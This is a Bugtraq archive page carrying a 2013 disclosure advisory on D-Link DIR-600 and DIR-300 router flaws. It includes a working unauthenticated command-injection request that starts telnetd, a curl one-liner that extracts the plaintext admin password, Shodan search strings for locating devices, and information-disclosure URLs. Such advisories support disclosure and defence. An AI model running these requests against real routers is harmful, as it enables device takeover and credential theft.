[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)
From: devnull@xxxxxxxxxxx
Date: Mon, 4 Feb 2013 14:15:58 GMT
Device Name: DIR-600 / DIR 300 - HW rev B1
Vendor: D-Link

============ Vulnerable Firmware Releases - DIR-300: ============

Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012

============ Vulnerable Firmware Releases - DIR-600: ============

Firmware-Version : 2.12b02 - 17/01/2012
Firmware-Version : 2.13b01 - 07/11/2012
Firmware-Version : 2.14b01 - 22/01/2013

============ Device Description: ============

D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high 
performance end-to-end wireless connectivity based on 802.11n technology. The 
DIR-600 provides better wireless coverage and improved speeds over standard 
802.11g*. Upgrading your home network to Wireless 150 provides an excellent 
solution for experiencing better wireless performance while sharing a broadband 
Internet connection with multiple computers over a secure wireless network.

Source (dead): 
http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...
German website: 
http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...

============ Shodan Torks ============

Shodan search:
Server: Linux, HTTP/1.1, DIR-300
Server: Linux, HTTP/1.1, DIR-600

============ Vulnerability Overview: ============

    * OS Command Injection (unauthenticated) 

=> Parameter cmd

The vulnerability is caused by missing access restrictions and missing input 
validation in the cmd parameter and can be exploited to inject and execute 
arbitrary shell commands.
It is possible to start a telnetd to compromise the device.

WARNING: You do not need to be authenticated to the device!

Screenshot: 
http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png

starting a telnet server:
Request:
POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 
Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;

You do not need to be authenticated to the device for executing the malicious 
commands. You could prepare the whole request and execute it without any 
authentication details.

For example you could start the telnetd on other ports and interfaces. So with 
this you are able to get a full shell *h00ray*

Nmap Scan after starting the telnetd:
Nmap scan report for 192.168.178.222
Host is up (0.022s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE VERSION
1/tcp     filtered tcpmux
23/tcp    open     telnet  BusyBox telnetd 1.14.1 <<==!!!
<snip>

Screenshot: 
http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injection-telnetd.png

    * Information disclosure: 

Nice server banner to detect this type of devices easily:
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Server: Linux, HTTP/1.1, DIR-600 Ver 2.12

    * For changing the current password there is no request to the current 
password 

With this vulnerability an attacker is able to change the current password 
without knowing it. The attacker needs access to an authenticated browser.

    * Insecure Cryptographic Storage: 

There is no password hashing implemented and so it is saved in plain text on 
the system:
# cat var/passwd
"admin" "test" "0"

Positive Technologies has released an advisory in 2011 and D-Link has fixed 
this issue:
http://en.securitylab.ru/lab/PT-2011-30
With the current version of the firmware the passwords are stored again in 
plaintext.

If you combine the plaintext credential vulnerability with the unauthenticated 
os command injection vulnerability you will get the following one liner to 
extract the admin password from every vulnerable device:

root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
root@bt:~#

    * Information Disclosure: 

Detailed device information including Model Name, Hardware Version, Linux 
Kernel, Firmware version, Language and MAC Addresses are available via the 
network.

Request:
http://Target-IP/DevInfo.txt

or try to access version.txt and have a look at the html source ;)

Response:
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>

These details are available without authentication.

    * Local path disclosure 

Every piece of information is interesting for the attacker. With this we will 
get some more details about the operating system and its paths.

Request:
http://<IP>/router_info.xml

Response:
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Date: Sat, 01 Jan 2000 21:22:43 GMT
Content-Type: text/xml
Content-Length: 49

EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)

    * Stored XSS via WLAN Assistent and Version Details 

Injecting scripts into the parameter SSID reveals that this parameter is not 
properly validated for malicious input.

=> Parameter: SSID

The injected code gets executed if you try to access the file version.txt. For 
this you do not need to be authenticated :)
http://Target-IP/version.txt

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/m1adv2013-003
Video: http://www.s3cur1ty.de/home-network-horror-days

============ Time Line: ============

14.12.2012 - discovered vulnerability
14.12.2012 - contacted dlink with the new vulnerability details via webinterface
20.12.2012 - contacted Heise Security with details and Heisec forwarded the 
details to D'Link
21.12.2012 - D'link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D'Link responded that this is a security problem from the user 
and/or browser and they will not provide a fix. Quite interesting but ok ...
25.01.2013 - I gave more details and as much input as possible so they can 
evaluate the vulnerabilities better
04.02.2013 - no more responses from D'Link, public release

===================== Advisory end =====================
Prev by Date: [IMF 2013] Call for Participation
Next by Date: Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Previous by thread: [IMF 2013] Call for Participation
Next by thread: Free Monthly Websites v2.0 - Multiple Web Vulnerabilities
Index(es):
- Date
- Thread